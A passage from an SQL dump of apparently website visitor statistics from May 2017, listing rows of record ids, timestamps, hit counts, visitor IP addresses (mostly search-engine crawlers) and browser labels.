8,1493885485,1,1,0,0,'173.252.88.91','other'),(106319,1493885577,1,1,0,0,'91.196.178.100','chrome'),(106320,1493886183,1,1,0,0,'217.69.133.3','other'),(106321,1493886237,1,1,0,0,'137.74.201.99','other'),(106322,1493886408,1,1,0,0,'157.55.39.182','other'),(106323,1493886889,1,1,0,0,'217.182.132.176','other'),(106324,1493886987,1,1,0,0,'157.55.39.201','other'),(106325,1493887134,1,1,0,0,'217.182.132.78','other'),(106326,1493887136,1,1,0,0,'217.69.133.253','other'),(106327,1493887326,1,1,0,0,'217.69.133.18','other'),(106328,1493887441,2,0,2,0,'66.249.69.20',''),(106329,1493887535,1,1,0,0,'180.76.15.27','other'),(106330,1493887536,1,1,0,0,'51.255.65.90','other'),(106331,1493887782,1,1,0,0,'164.132.162.164','other'),(106332,1493888127,1,1,0,0,'37.55.151.61','firefox'),(106333,1493888252,1,1,0,0,'164.132.161.78','other'),(106334,1493888314,1,1,0,0,'164.132.161.18','other'),(106335,1493888410,1,1,0,0,'91.196.178.129','firefox'),(106336,1493888506,1,1,0,0,'217.69.133.6','other'),(106337,1493888522,1,1,0,0,'46.161.116.62','firefox'),(106338,1493888631,2,0,2,0,'66.249.69.74',''),(106339,1493888915,1,1,0,0,'217.182.132.148','other'),(106340,1493889087,1,1,0,0,'91.196.178.68','chrome'),(106341,1493889223,1,0,1,0,'66.249.69.69',''),(106342,1493889529,1,1,0,0,'164.132.161.9','other'),(106343,1493889591,1,1,0,0,'164.132.161.23','other'),(106344,1493889675,1,1,0,0,'51.255.65.22','other'),(106345,1493890327,1,1,0,0,'217.182.132.79','other'),(106346,1493890464,1,1,0,0,'51.255.71.100','other'),(106347,1493890686,1,1,0,0,'91.196.178.71','chrome'),(106348,1493891071,1,1,0,0,'46.133.199.29','firefox'),(106349,1493891256,2,0,2,0,'66.249.69.79',''),(106350,1493891329,1,1,0,0,'51.255.71.118','other'),(106351,1493891367,1,1,0,0,'217.69.133.253','other'),(106352,1493891425,1,1,0,0,'217.182.132.182','other'),(106353,1493891597,1,1,0,0,'51.255.65.5','other'),(106354,1493891638,1,1,0,0,'91.196.178.69','firefox'),(106355,1493891671,1,0,1,0,'68.180.231.24',''),(106356,1493891694,1,1,0,0,'37.55.151.61','firefox'),(106357,1493892207,1,1,0,0,'193.151.240.58','chrome'),(106358,1493892507,1,1,0,0,'217.182.132.85','other'),(106359,1493892659,1,1,0,0,'51.255.65.14','other'),(106360,1493892771,1,1,0,0,'217.182.132.149','other'),(106361,1493892972,1,1,0,0,'217.69.133.2','other'),(106362,1493893111,1,1,0,0,'130.180.216.90','firefox'),(106363,1493893123,1,1,0,0,'164.132.161.4','other'),(106364,1493893525,1,1,0,0,'217.69.133.253','other'),(106365,1493893527,1,1,0,0,'217.69.133.191','other'),(106366,1493893667,1,0,1,0,'66.249.69.20',''),(106367,1493893709,1,0,1,0,'66.249.69.79',''),(106368,1493894006,1,1,0,0,'217.182.132.181','other'),(106369,1493894574,2,2,0,0,'216.244.66.237','other'),(106370,1493894582,1,1,0,0,'51.255.65.48','other'),(106371,1493894675,1,1,0,0,'217.69.133.11','other'),(106372,1493895089,1,1,0,0,'91.196.178.65','chrome'),(106373,1493895095,1,1,0,0,'217.69.133.72','other'),(106374,1493895232,1,1,0,0,'93.158.152.79','other'),(106375,1493895240,1,1,0,0,'141.8.142.154','other'),(106376,1493895396,1,1,0,0,'51.255.65.28','other'),(106377,1493895537,1,1,0,0,'91.196.178.168','chrome'),(106378,1493895710,1,0,1,0,'66.249.69.74',''),(106379,1493895745,1,1,0,0,'217.69.133.225','other'),(106380,1493895913,1,1,0,0,'8.29.198.27','other'),(106381,1493896232,1,1,0,0,'51.255.65.64','other'),(106382,1493896675,1,1,0,0,'164.132.161.88','other'),(106383,1493897662,1,1,0,0,'217.69.133.14','other'),(106384,1493898656,1,1,0,0,'164.132.161.16','other'),(106385,1493899557,1,1,0,0,'130.180.208.202','firefox'),(106386,1493899843,1,1,0,0,'91.196.178.169','chrome'),(106387,1493899891,1,1,0,0,'66.249.69.79','chrome'),(106388,1493900017,1,1,0,0,'51.255.65.77','other'),(106389,1493900258,3,3,0,0,'141.8.142.154','other'),(106390,1493900345,1,1,0,0,'95.108.213.34','other'),(106391,1493900381,1,1,0,0,'216.244.66.237','other'),(106392,1493900416,1,1,0,0,'5.255.253.63','other'),(106393,1493900428,1,1,0,0,'93.158.152.79','other'),(106394,1493900479,1,1,0,0,'95.108.179.15','other'),(106395,1493900511,1,1,0,0,'141.8.142.164','other'),(106396,1493900625,1,1,0,0,'91.196.178.70','firefox'),(106397,1493900674,1,1,0,0,'91.196.178.68','firefox'),(106398,1493901776,1,0,1,0,'66.249.69.24',''),(106399,1493901829,1,0,1,0,'66.249.69.20',''),(106400,1493901903,1,0,1,0,'66.249.69.74',''),(106401,1493902193,1,1,0,0,'217.182.132.21','other'),(106402,1493902215,1,1,0,0,'217.182.132.81','other'),(106403,1493902248,1,1,0,0,'217.182.132.73','other'),(106404,1493902626,1,1,0,0,'217.182.132.33','other'),(106405,1493902713,1,1,0,0,'164.132.161.79','other'),(106406,1493902721,1,1,0,0,'51.255.65.22','other'),(106407,1493902784,1,1,0,0,'217.69.133.230','other'),(106408,1493903015,1,1,0,0,'164.132.161.33','other'),(106409,1493903210,1,1,0,0,'46.164.155.57','chrome'),(106410,1493904043,1,1,0,0,'164.132.161.59','other'),(106411,1493904620,1,1,0,0,'81.30.160.98','firefox'),(106412,1493904756,1,1,0,0,'5.255.253.58','other'),(106413,1493904763,1,0,1,0,'68.180.231.24',''),(106414,1493905103,1,1,0,0,'213.108.75.167','firefox'),(106415,1493905258,1,1,0,0,'51.255.65.45','other'),(106416,1493905438,1,1,0,0,'157.55.39.201','other'),(106417,1493905513,1,1,0,0,'51.255.65.15','other'),(106418,1493905562,1,1,0,0,'217.69.133.220','other'),(106419,1493905779,1,1,0,0,'5.9.88.103','other'),(106420,1493905850,1,1,0,0,'164.132.161.59','other'),(106421,1493906062,1,1,0,0,'217.182.132.50','other'),(106422,1493906289,1,1,0,0,'217.69.133.224','other'),(106423,1493906429,1,1,0,0,'95.135.18.59','firefox'),(106424,1493906549,1,1,0,0,'164.132.161.61','other'),(106425,1493906569,1,1,0,0,'217.69.133.5','other'),(106426,1493906627,1,0,1,0,'66.249.69.24',''),(106427,1493906636,1,0,1,0,'66.249.69.16',''),(106428,1493906735,1,1,0,0,'8.29.198.27','other'),(106429,1493906801,1,1,0,0,'164.132.161.26','other'),(106430,1493906905,1,1,0,0,'95.132.28.85','firefox'),(106431,1493906987,1,1,0,0,'37.55.151.61','firefox'),(106432,1493908208,1,1,0,0,'217.182.132.20','other'),(106433,1493908326,1,1,0,0,'217.69.133.193','other'),(106434,1493908388,1,1,0,0,'66.249.93.157','chrome'),(106435,1493908441,1,1,0,0,'51.255.65.63','other'),(106436,1493908464,1,1,0,0,'217.182.132.83','other'),(106437,1493908700,1,1,0,0,'217.69.133.245','other'),(106438,1493909160,1,1,0,0,'217.182.132.147','other'),(106439,1493909220,1,0,1,0,'66.249.69.20',''),(106440,1493910025,1,1,0,0,'164.132.161.76','other'),(106441,1493910110,8,8,0,0,'46.229.168.73','other'),(106442,1493910132,3,3,0,0,'46.229.168.70','other'),(106443,1493910143,5,5,0,0,'46.229.168.75','other'),(106444,1493910167,1,1,0,0,'217.69.133.203','other'),(106445,1493910168,3,3,0,0,'46.229.168.74','other'),(106446,1493910180,2,2,0,0,'46.229.168.69','other'),(106447,1493910184,2,2,0,0,'46.229.168.71','other'),(106448,1493910197,4,4,0,0,'46.229.168.66','other'),(106449,1493910225,2,2,0,0,'46.229.168.68','other'),(106450,1493910237,1,1,0,0,'46.229.168.65','other'),(106451,1493910250,1,1,0,0,'157.55.39.36','other'),(106452,1493910278,1,1,0,0,'51.255.65.21','other'),(106453,1493910313,2,2,0,0,'46.229.168.72','other'),(106454,1493910381,1,1,0,0,'164.132.161.91','other'),(106455,1493910568,1,1,0,0,'217.69.136.205','other'),(106456,1493910949,1,0,1,0,'66.249.69.24',''),(106457,1493911093,1,1,0,0,'217.69.133.28','other'),(106458,1493911525,1,1,0,0,'91.196.178.72','chrome'),(106459,1493911812,1,1,0,0,'164.132.161.54','other'),(106460,1493912375,1,1,0,0,'217.69.133.231','other'),(106461,1493912440,1,1,0,0,'178.154.200.42','other'),(106462,1493912460,1,1,0,0,'137.74.207.120','other'),(106463,1493912478,1,1,0,0,'217.182.132.156','other'),(106464,1493913101,1,1,0,0,'216.244.66.237','other'),(106465,1493913159,1,0,1,0,'66.249.69.79',''),(106466,1493913354,1,0,1,0,'66.249.69.24',''),(106467,1493913557,1,0,1,0,'66.249.69.69',''),(106468,1493913950,1,1,0,0,'93.175.236.51','firefox'),(106469,1493914001,1,1,0,0,'2.92.194.202','msie'),(106470,1493914097,1,1,0,0,'95.108.213.34','other'),(106471,1493914197,1,1,0,0,'194.44.144.18','chrome'),(106472,1493914739,1,1,0,0,'217.69.133.12','other'),(106473,1493914867,1,1,0,0,'164.132.161.89','other'),(106474,1493915124,1,1,0,0,'51.255.65.49','other'),(106475,1493915303,1,0,1,0,'157.55.39.38',''),(106476,1493915408,1,1,0,0,'217.182.132.91','other'),(106477,1493915591,1,1,0,0,'51.255.65.91','other'),(106478,1493915762,1,1,0,0,'51.255.71.123','other'),(106479,1493916391,1,1,0,0,'51.255.65.80','other'),(106480,1493917505,1,1,0,0,'51.255.65.31','other'),(106481,1493917581,1,1,0,0,'8.29.198.27','other'),(106482,1493918419,1,1,0,0,'173.252.123.130','other'),(106483,1493918545,1,1,0,0,'95.108.213.32','other'),(106484,1493918600,1,1,0,0,'95.108.213.34','other'),(106485,1493918905,1,1,0,0,'180.76.15.137','other'),(106486,1493919207,1,1,0,0,'217.182.132.177','other'),(106487,1493919471,1,1,0,0,'217.182.132.31','other'),(106488,1493919966,1,0,1,0,'66.249.69.79',''),(106489,1493920830,1,1,0,0,'66.220.156.148','other'),(106490,1493921126,1,1,0,0,'91.196.177.80','chrome'),(106491,1493921625,1,0,1,0,'66.249.69.60',''),(106492,1493921643,1,0,1,0,'66.249.69.57',''),(106493,1493921859,1,1,0,0,'109.173.57.46','msie'),(106494,1493921872,1,1,0,0,'176.15.58.87','msie'),(106495,1493921911,1,1,0,0,'157.55.39.38','other'),(106496,1493922083,1,1,0,0,'51.255.65.28','other'),(106497,1493922140,1,0,1,0,'66.249.69.79',''),(106498,1493922361,1,1,0,0,'217.69.133.224','other'),(106499,1493922433,1,0,1,0,'66.249.69.24',''),(106500,1493922454,1,0,1,0,'66.249.69.20',''),(106501,1493922764,1,1,0,0,'217.182.132.24','other'),(106502,1493923097,1,1,0,0,'51.255.65.48','other'),(106503,1493923364,1,0,1,0,'66.249.69.74',''),(106504,1493923687,1,1,0,0,'91.196.178.163','chrome'),(106505,1493923692,1,1,0,0,'66.249.69.74','chrome'),(106506,1493924457,1,1,0,0,'217.182.132.97','other'),(106507,1493924562,1,1,0,0,'40.77.167.16','other'),(106508,1493924607,1,1,0,0,'176.8.141.224','chrome'),(106509,1493925264,1,0,1,0,'66.249.69.24',''),(106510,1493926411,1,1,0,0,'164.132.161.6','other'),(106511,1493926732,1,1,0,0,'217.69.133.15','other'),(106512,1493926846,1,1,0,0,'217.182.132.52','other'),(106513,1493927052,1,0,1,0,'66.249.69.69',''),(106514,1493927115,1,1,0,0,'51.255.65.70','other'),(106515,1493927370,1,0,1,0,'207.46.13.102',''),(106516,1493927373,1,1,0,0,'91.196.178.66','chrome'),(106517,1493927904,1,1,0,0,'217.69.133.3','other'),(106518,1493928030,1,1,0,0,'217.182.132.87','other'),(106519,1493928419,1,1,0,0,'8.29.198.25','other'),(106520,1493928634,1,1,0,0,'176.15.230.238','chrome'),(106521,1493929740,1,1,0,0,'217.182.132.88','other'),(106522,1493929957,1,1,0,0,'178.154.200.45','other'),(106523,1493930128,1,1,0,0,'217.182.132.6','other'),(106524,1493930499,1,1,0,0,'217.182.132.157','other'),(106525,1493930508,1,1,0,0,'217.182.132.14','other'),(106526,1493930611,1,1,0,0,'216.244.66.237','other'),(106527,1493930634,1,1,0,0,'51.255.71.100','other'),(106528,1493930647,1,1,0,0,'217.182.132.33','other'),(106529,1493930860,1,1,0,0,'141.8.142.164','other'),(106530,1493931451,1,1,0,0,'164.132.161.50','other'),(106531,1493931843,1,1,0,0,'164.132.161.5','other'),(106532,1493932076,1,1,0,0,'217.182.132.64','other'),(106533,1493932411,1,1,0,0,'217.69.133.248','other'),(106534,1493932781,1,1,0,0,'217.69.133.218','other'),(106535,1493932909,1,1,0,0,'137.74.207.120','other'),(106536,1493933166,1,1,0,0,'51.255.65.95','other'),(106537,1493933361,1,0,1,0,'66.249.69.79',''),(106538,1493933467,2,0,2,0,'66.249.69.69',''),(106539,1493933878,1,1,0,0,'217.182.132.50','other'),(106540,1493933887,1,0,1,0,'66.249.69.16',''),(106541,1493933891,1,1,0,0,'217.69.136.209','other'),(106542,1493933919,1,0,1,0,'66.249.69.74',''),(106543,1493934061,1,0,1,0,'66.249.69.20',''),(106544,1493934085,1,1,0,0,'164.132.161.76','other'),(106545,1493934948,1,0,1,0,'66.249.69.69',''),(106546,1493935238,2,0,2,0,'66.249.69.79',''),(106547,1493935360,1,1,0,0,'51.255.65.55','other'),(106548,1493935408,1,0,1,0,'66.249.69.24',''),(106549,1493935430,1,0,1,0,'66.249.69.16',''),(106550,1493936085,1,1,0,0,'217.182.132.33','other'),(106551,1493936104,1,1,0,0,'217.182.132.150','other'),(106552,1493936271,1,1,0,0,'51.255.65.58','other'),(106553,1493936434,1,1,0,0,'51.255.65.66','other'),(106554,1493936585,1,0,1,0,'207.46.13.93',''),(106555,1493936958,1,1,0,0,'95.108.179.15','other'),(106556,1493937106,1,1,0,0,'217.182.132.174','other'),(106557,1493937596,1,1,0,0,'164.132.161.57','other'),(106558,1493937776,1,1,0,0,'217.182.132.149','other'),(106559,1493938224,1,1,0,0,'164.132.161.21','other'),(106560,1493939137,1,1,0,0,'164.132.161.75','other'),(106561,1493939249,1,1,0,0,'8.29.198.25','other'),(106562,1493939259,1,1,0,0,'217.182.132.95','other'),(106563,1493941203,1,1,0,0,'217.182.132.14','other'),(106564,1493941224,1,1,0,0,'137.74.207.164','other'),(106565,1493941388,1,1,0,0,'51.255.65.39','other'),(106566,1493942603,1,0,1,0,'66.249.69.79',''),(106567,1493942620,1,1,0,0,'51.255.65.90','other'),(106568,1493942724,1,0,1,0,'66.249.69.16',''),(106569,1493942814,1,1,0,0,'217.182.132.20','other'),(106570,1493942880,1,1,0,0,'51.255.65.54','other'),(106571,1493942987,1,1,0,0,'217.69.133.237','other'),(106572,1493943218,1,1,0,0,'5.255.253.58','other'),(106573,1493943309,1,1,0,0,'164.132.161.65','other'),(106574,1493943328,2,2,0,0,'141.8.142.15','other'),(106575,1493943391,1,1,0,0,'95.108.179.15','other'),(106576,1493943445,1,1,0,0,'141.8.142.164','other'),(106577,1493943472,1,1,0,0,'95.108.213.34','other'),(106578,1493943569,1,1,0,0,'217.182.132.80','other'),(106579,1493943599,1,1,0,0,'164.132.161.4','other'),(106580,1493944027,1,1,0,0,'217.182.132.174','other'),(106581,1493944101,1,0,1,0,'66.249.69.20',''),(106582,1493944188,1,0,1,0,'66.249.69.24',''),(106583,1493944510,1,1,0,0,'137.74.207.110','other'),(106584,1493944577,1,1,0,0,'88.198.55.175','other'),(106585,1493944654,1,1,0,0,'164.132.161.85','other'),(106586,1493945318,1,1,0,0,'217.69.133.228','other'),(106587,1493945429,1,1,0,0,'217.69.136.209','other'),(106588,1493945615,1,1,0,0,'137.74.207.164','other'),(106589,1493946134,1,1,0,0,'217.182.132.93','other'),(106590,1493946200,1,1,0,0,'164.132.161.42','other'),(106591,1493946571,1,1,0,0,'164.132.161.78','other'),(106592,1493947001,1,1,0,0,'217.69.133.227','other'),(106593,1493947700,1,1,0,0,'164.132.161.37','other'),(106594,1493947958,1,1,0,0,'217.69.133.28','other'),(106595,1493948057,1,1,0,0,'217.182.132.95','other'),(106596,1493948124,1,1,0,0,'51.255.65.224','other'),(106597,1493948741,1,0,1,0,'207.46.13.93',''),(106598,1493948755,1,1,0,0,'217.69.136.203','other'),(106599,1493948835,1,1,0,0,'164.132.161.82','other'),(106600,1493949139,1,1,0,0,'217.69.136.205','other'),(106601,1493949257,1,1,0,0,'217.69.133.3','other'),(106602,1493949403,1,1,0,0,'217.182.132.81','other'),(106603,1493949441,1,1,0,0,'51.255.65.49','other'),(106604,1493949821,1,1,0,0,'137.74.207.102','other'),(106605,1493949931,1,1,0,0,'217.182.132.36','other'),(106606,1493949954,1,1,0,0,'217.69.133.69','other'),(106607,1493950082,1,1,0,0,'8.29.198.25','other'),(106608,1493950105,1,1,0,0,'164.132.161.61','other'),(106609,1493950196,1,1,0,0,'180.76.15.7','other'),(106610,1493950305,1,1,0,0,'217.182.132.83','other'),(106611,1493950588,1,0,1,0,'66.249.76.107',''),(106612,1493950708,1,1,0,0,'164.132.161.36','other'),(106613,1493950710,1,1,0,0,'164.132.161.35','other'),(106614,1493950961,1,1,0,0,'37.146.176.188','msie'),(106615,1493951119,1,1,0,0,'51.255.71.115','other'),(106616,1493951325,1,1,0,0,'164.132.161.44','other'),(106617,1493951607,1,1,0,0,'217.182.132.23','other'),(106618,1493951876,1,1,0,0,'217.182.132.74','other'),(106619,1493952169,1,1,0,0,'51.255.65.8','other'),(106620,1493952190,1,1,0,0,'217.69.133.234','other'),(106621,1493952196,1,1,0,0,'180.76.15.18','other'),(106622,1493952200,1,1,0,0,'164.132.161.30','other'),(106623,1493952247,1,0,1,0,'66.249.66.210',''),(106624,1493952309,1,1,0,0,'51.255.65.79','other'),(106625,1493952447,1,1,0,0,'217.69.133.227','other'),(106626,1493952538,1,1,0,0,'164.132.162.188','other'),(106627,1493952540,1,1,0,0,'51.255.65.21','other'),(106628,1493952743,1,1,0,0,'51.255.65.52','other'),(106629,1493952873,1,1,0,0,'51.255.65.55','other'),(106630,1493953111,1,1,0,0,'164.132.161.6','other'),(106631,1493953223,1,1,0,0,'51.255.65.20','other'),(106632,1493953320,2,0,2,0,'66.249.76.27',''),(106633,1493953629,1,1,0,0,'164.132.161.32','other'),(106634,1493953939,1,1,0,0,'157.55.39.91','other'),(106635,1493954328,1,1,0,0,'51.255.65.64','other'),(106636,1493954381,2,0,2,0,'66.249.76.28',''),(106637,1493954396,1,1,0,0,'51.255.71.115','other'),(106638,1493954867,1,1,0,0,'164.132.161.67','other'),(106639,1493954901,1,1,0,0,'51.255.71.111','other'),(106640,1493955051,1,1,0,0,'217.69.133.192','other'),(106641,1493955146,1,1,0,0,'217.182.132.50','other'),(106642,1493955612,1,1,0,0,'164.132.161.87','other'),(106643,1493956000,1,1,0,0,'217.182.132.85','other'),(106644,1493956033,1,0,1,0,'66.249.76.28',''),(106645,1493956078,1,1,0,0,'51.255.65.2','other'),(106646,1493956180,1,1,0,0,'217.182.132.81','other'),(106647,1493956209,1,1,0,0,'217.69.133.241','other'),(106648,1493956350,1,0,1,0,'66.249.76.107',''),(106649,1493956554,1,1,0,0,'207.46.13.102','other'),(106650,1493956657,1,1,0,0,'164.132.161.61','other'),(106651,1493956828,1,0,1,0,'157.55.39.91',''),(106652,1493957828,1,0,1,0,'66.249.66.87',''),(106653,1493958364,1,1,0,0,'51.255.65.47','other'),(106654,1493958520,1,0,1,0,'66.249.76.108',''),(106655,1493958859,1,1,0,0,'91.196.178.67','firefox'),(106656,1493959097,1,0,1,0,'66.249.76.27',''),(106657,1493959150,1,1,0,0,'51.255.65.10','other'),(106658,1493959250,1,0,1,0,'66.249.76.28',''),(106659,1493959472,1,1,0,0,'217.182.132.70','other'),(106660,1493960251,1,1,0,0,'164.132.161.67','other'),(106661,1493960446,1,1,0,0,'5.3.235.89','msie'),(106662,1493960502,1,1,0,0,'164.132.161.39','other'),(106663,1493960756,1,1,0,0,'51.255.65.85','other'),(106664,1493960910,1,1,0,0,'8.29.198.25','other'),(106665,1493960958,9,9,0,0,'118.193.203.205','other'),(106666,1493961122,1,1,0,0,'217.182.132.176','other'),(106667,1493961541,1,1,0,0,'51.255.65.75','other'),(106668,1493962654,1,1,0,0,'217.182.132.177','other'),(106669,1493962752,1,1,0,0,'54.165.59.7','other'),(106670,1493962982,1,0,1,0,'66.249.76.28',''),(106671,1493962987,1,1,0,0,'217.69.133.223','other'),(106672,1493963124,1,0,1,0,'66.249.76.108',''),(106673,1493963440,1,0,1,0,'157.55.39.90',''),(106674,1493963619,1,1,0,0,'51.255.71.121','other'),(106675,1493963640,1,1,0,0,'157.55.39.90','other'),(106676,1493963881,1,1,0,0,'66.102.9.25','chrome'),(106677,1493963964,1,1,0,0,'130.180.218.86','chrome'),(106678,1493964222,1,1,0,0,'217.69.133.222','other'),(106679,1493964322,1,1,0,0,'37.52.22.225','firefox'),(106680,1493964464,1,1,0,0,'51.255.65.36','other'),(106681,1493965178,1,1,0,0,'217.69.133.250','other'),(106682,1493965180,1,1,0,0,'217.69.133.253','other'),(106683,1493965184,1,1,0,0,'91.196.178.67','firefox'),(106684,1493965719,1,1,0,0,'37.52.22.225','firefox'),(106685,1493966125,1,1,0,0,'91.196.178.68','chrome'),(106686,1493966184,1,1,0,0,'51.255.71.121','other'),(106687,1493966314,1,1,0,0,'217.69.133.225','other'),(106688,1493966381,1,1,0,0,'91.196.178.133','firefox'),(106689,1493966824,1,1,0,0,'91.196.178.68','firefox'),(106690,1493966887,1,1,0,0,'217.69.133.249','other'),(106691,1493967102,1,1,0,0,'91.196.178.68','chrome'),(106692,1493967381,29,29,0,0,'46.4.32.75','other'),(106693,1493967382,1,0,1,0,'66.249.76.107',''),(106694,1493967612,1,1,0,0,'217.69.133.192','other'),(106695,1493967720,1,1,0,0,'51.255.65.33','other'),(106696,1493967808,1,1,0,0,'95.132.12.42','firefox'),(106697,1493967817,1,1,0,0,'217.182.132.16','other'),(106698,1493968714,1,1,0,0,'180.76.15.163','other'),(106699,1493969143,1,1,0,0,'217.182.132.174','other'),(106700,1493969208,1,1,0,0,'46.165.197.142','other'),(106701,1493969263,1,0,1,0,'66.249.76.29',''),(106702,1493970233,1,1,0,0,'217.69.133.243','other'),(106703,1493970369,1,1,0,0,'217.69.133.222','other'),(106704,1493970415,1,1,0,0,'137.74.201.100','other'),(106705,1493970736,1,1,0,0,'51.255.65.90','other'),(106706,1493971047,1,1,0,0,'164.132.161.18','other'),(106707,1493971172,1,1,0,0,'217.69.133.216','other'),(106708,1493971331,1,1,0,0,'51.255.71.114','other'),(106709,1493971376,1,1,0,0,'217.182.132.35','other'),(106710,1493971724,1,1,0,0,'94.178.147.113','chrome'),(106711,1493971737,1,1,0,0,'8.29.198.25','other'),(106712,1493971803,1,1,0,0,'164.132.161.4','other'),(106713,1493971827,1,0,1,0,'157.55.39.90',''),(106714,1493971834,1,1,0,0,'217.69.136.208','other'),(106715,1493971919,1,1,0,0,'66.102.9.35','chrome'),(106716,1493972294,1,0,1,0,'66.249.66.81',''),(106717,1493972303,2,2,0,0,'217.69.133.219','other'),(106718,1493972313,1,1,0,0,'217.182.132.148','other'),(106719,1493972339,1,0,1,0,'66.249.76.27',''),(106720,1493972810,1,1,0,0,'217.182.132.240','other'),(106721,1493973936,1,0,1,0,'66.249.76.108',''),(106722,1493973967,1,1,0,0,'91.196.178.70','chrome'),(106723,1493973989,1,1,0,0,'141.8.142.42','other'),(106724,1493974040,1,1,0,0,'141.8.132.39','other'),(106725,1493974044,1,1,0,0,'5.255.253.28','other'),(106726,1493974300,1,1,0,0,'91.196.177.15','chrome'),(106727,1493974664,1,1,0,0,'217.69.133.15','other'),(106728,1493974726,2,2,0,0,'91.196.177.42','chrome'),(106729,1493975152,1,1,0,0,'217.182.132.16','other'),(106730,1493975169,1,1,0,0,'80.254.155.43','chrome'),(106731,1493975933,1,1,0,0,'164.132.161.23','other'),(106732,1493976047,1,1,0,0,'176.98.80.97','chrome'),(106733,1493976099,1,1,0,0,'51.255.65.60','other'),(106734,1493976101,1,1,0,0,'217.182.132.85','other'),(106735,1493976444,1,1,0,0,'95.158.53.43','chrome'),(106736,1493976687,1,1,0,0,'180.76.15.142','other'),(106737,1493977193,1,0,1,0,'66.249.66.210',''),(106738,1493977294,1,1,0,0,'91.196.178.68','firefox'),(106739,1493977415,1,1,0,0,'217.69.133.60','other'),(106740,1493978322,1,1,0,0,'37.52.22.225','firefox'),(106741,1493978994,1,1,0,0,'217.69.133.84','other'),(106742,1493979066,1,1,0,0,'91.196.178.162','chrome'),(106743,1493979089,1,1,0,0,'217.182.132.82','other'),(106744,1493979152,1,1,0,0,'94.100.214.129','chrome'),(106745,1493979578,1,1,0,0,'217.182.132.191','other'),(106746,1493979583,1,1,0,0,'91.196.178.67','firefox'),(106747,1493979884,1,1,0,0,'51.255.65.30','other'),(106748,1493980132,1,1,0,0,'217.69.133.2','other'),(106749,1493980423,1,1,0,0,'217.69.133.252','other'),(106750,1493980425,1,1,0,0,'217.69.133.191','other'),(106751,1493980560,1,1,0,0,'217.182.132.56','other'),(106752,1493980764,1,1,0,0,'91.196.178.71','chrome'),(106753,1493980985,1,1,0,0,'217.69.136.203','other'),(106754,1493980990,1,1,0,0,'164.132.161.90','other'),(106755,1493981196,1,1,0,0,'5.255.253.63','other'),(106756,1493981541,1,1,0,0,'66.249.76.109','chrome'),(106757,1493981597,1,1,0,0,'164.132.161.19','other'),(106758,1493981643,1,1,0,0,'164.132.161.65','other'),(106759,1493981878,1,1,0,0,'207.46.13.102','other'),(106760,1493982396,1,1,0,0,'217.69.133.70','other'),(106761,1493982562,1,1,0,0,'8.29.198.27','other'),(106762,1493982886,1,0,1,0,'66.249.76.107',''),(106763,1493982968,1,1,0,0,'164.132.161.57','other'),(106764,1493983088,1,1,0,0,'217.69.133.59','other'),(106765,1493983102,1,1,0,0,'91.196.178.67','firefox'),(106766,1493983524,1,1,0,0,'37.52.22.225','firefox'),(106767,1493983543,1,0,1,0,'66.249.66.210',''),(106768,1493983584,1,1,0,0,'213.208.163.206','chrome'),(106769,1493984334,1,0,1,0,'66.249.66.84',''),(106770,1493984391,1,1,0,0,'91.196.178.162','chrome'),(106771,1493984625,1,1,0,0,'5.189.176.182','other'),(106772,1493984854,1,1,0,0,'217.182.132.74','other'),(106773,1493984910,1,1,0,0,'217.69.136.208','other'),(106774,1493984932,1,1,0,0,'164.132.164.180','other'),(106775,1493985574,1,1,0,0,'31.129.162.50','chrome'),(106776,1493985895,1,1,0,0,'217.182.132.75','other'),(106777,1493986467,1,1,0,0,'217.69.136.203','other'),(106778,1493986841,1,1,0,0,'91.196.177.46','firefox'),(106779,1493986936,1,1,0,0,'217.69.133.225','other'),(106780,1493987260,1,1,0,0,'51.255.65.88','other'),(106781,1493987500,1,1,0,0,'91.196.178.67','firefox'),(106782,1493987544,1,1,0,0,'164.132.161.11','other'),(106783,1493987745,1,1,0,0,'91.196.177.46','chrome'),(106784,1493988093,2,2,0,0,'91.196.178.70','firefox'),(106785,1493988591,1,1,0,0,'164.132.161.80','other'),(106786,1493988864,1,1,0,0,'91.196.178.71','chrome'),(106787,1493988884,1,1,0,0,'137.74.207.119','other'),(106788,1493988976,1,1,0,0,'217.69.136.210','other'),(106789,1493989347,1,1,0,0,'217.69.133.14','other'),(106790,1493989349,1,1,0,0,'217.69.133.13','other'),(106791,1493989662,1,1,0,0,'91.196.178.162','chrome'),(106792,1493989812,1,1,0,0,'91.196.178.67','firefox'),(106793,1493989830,2,0,2,0,'66.249.76.28',''),(106794,1493989879,1,1,0,0,'217.182.132.146','other'),(106795,1493990264,1,1,0,0,'217.69.133.203','other'),(106796,1493990277,1,1,0,0,'51.255.65.11','other'),(106797,1493990348,1,1,0,0,'217.69.133.67','other'),(106798,1493990359,1,1,0,0,'217.69.133.217','other'),(106799,1493990392,1,1,0,0,'217.182.132.33','other'),(106800,1493990511,1,1,0,0,'164.132.161.43','other'),(106801,1493990512,1,1,0,0,'217.182.132.72','other'),(106802,1493990532,1,1,0,0,'164.132.161.40','other'),(106803,1493991278,1,1,0,0,'51.255.65.57','other'),(106804,1493992048,1,1,0,0,'51.255.71.110','other'),(106805,1493992365,1,1,0,0,'66.249.76.107','chrome'),(106806,1493992509,1,1,0,0,'164.132.161.31','other'),(106807,1493993017,1,1,0,0,'217.69.133.246','other'),(106808,1493993278,1,1,0,0,'66.249.66.84','chrome'),(106809,1493993380,1,1,0,0,'217.69.133.5','other'),(106810,1493993396,1,1,0,0,'8.29.198.27','other'),(106811,1493993455,1,1,0,0,'91.209.11.236','other'),(106812,1493993961,1,1,0,0,'66.249.93.205','chrome'),(106813,1493994082,1,1,0,0,'51.255.71.130','other'),(106814,1493994196,1,1,0,0,'51.255.71.115','other'),(106815,1493994353,1,1,0,0,'217.69.133.247','other'),(106816,1493994893,1,1,0,0,'91.196.178.36','chrome'),(106817,1493995023,1,1,0,0,'217.69.133.219','other'),(106818,1493995590,1,0,1,0,'66.249.76.108',''),(106819,1493996195,1,1,0,0,'164.132.161.88','other'),(106820,1493996535,1,1,0,0,'217.182.132.78','other'),(106821,1493996547,1,1,0,0,'217.182.132.6','other'),(106822,1493996763,1,1,0,0,'51.255.65.65','other'),(106823,1493997672,1,1,0,0,'217.69.133.190','other'),(106824,1493997816,1,1,0,0,'217.69.133.253','other'),(106825,1493997936,1,1,0,0,'164.132.161.31','other'),(106826,1493997943,1,1,0,0,'164.132.161.18','other'),(106827,1493998116,1,1,0,0,'51.255.71.122','other'),(106828,1493999291,1,0,1,0,'66.249.66.81',''),(106829,1493999292,1,0,1,0,'66.249.76.28',''),(106830,1493999361,1,1,0,0,'217.69.133.232','other'),(106831,1493999600,1,1,0,0,'217.69.133.85','other'),(106832,1494000116,1,1